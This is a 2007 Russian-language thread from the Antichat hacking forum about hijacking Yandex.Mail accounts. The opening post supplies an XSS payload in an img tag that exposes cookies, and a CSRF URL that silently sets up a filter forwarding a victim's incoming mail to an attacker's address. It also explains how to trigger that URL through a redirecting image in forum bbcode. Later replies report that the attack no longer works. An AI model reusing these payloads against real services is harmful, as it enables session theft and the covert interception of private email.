HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Яндекс.Почта Hijacking
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Яндекс.Почта Hijacking
  #1  
Старый 19.08.2007, 19:41
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
С нами: 10143866

Репутация: 201
По умолчанию Яндекс.Почта Hijacking
1. XSS
При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида
Код:
<img src=http://ya.ru/a?');alert(document.cookie+'>
2. Mail Forwarding
При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида
Код:
http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B8%D0%B5&cliker=forward&forward_address=xakep@antichat.ru&forward_with_store=on&order=1
то отныне вся входящая почта будет пересылаться также на адрес xakep@antichat.ru. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось V1k; 19.08.2007 в 20:19..
 
Ответить с цитированием

  #2  
Старый 20.08.2007, 17:24
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
С нами: 10866626

Репутация: 4268


По умолчанию
То есть, фактичеки это позволит читать письма жертвы?
__________________
...
 
Ответить с цитированием

  #3  
Старый 20.08.2007, 17:34
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
С нами: 10143866

Репутация: 201
По умолчанию
те, которые придут после просмотра жертвой картинки/посещения ссылки -да
 
Ответить с цитированием

  #4  
Старый 21.08.2007, 16:27
DSSS
Новичок
Регистрация: 18.06.2007
Сообщений: 2
С нами: 9945907

Репутация: 0
По умолчанию
баян
 
Ответить с цитированием

  #5  
Старый 22.08.2007, 00:39
Skaret
Новичок
Регистрация: 13.08.2007
Сообщений: 3
С нами: 9865650

Репутация: -12
По умолчанию
Что-то не работает..Ты сам проверял?
 
Ответить с цитированием

  #6  
Старый 23.08.2007, 20:45
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
С нами: 9879714

Репутация: 291
По умолчанию
честно говоря я сам уже давно не проверял
раньше для создания фильтра на яндексе вроде был важен реферер,гет запрос прокатывал
На рамблере например реферер не помню проверяется или нет,вроде нет,
но катит только пост запрос,по крайней мере когда это пробовал я..
 
Ответить с цитированием

  #7  
Старый 23.08.2007, 20:53
vadim399
Banned
Регистрация: 27.05.2007
Сообщений: 368
С нами: 9978146

Репутация: 589
По умолчанию
Нече не пашет...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...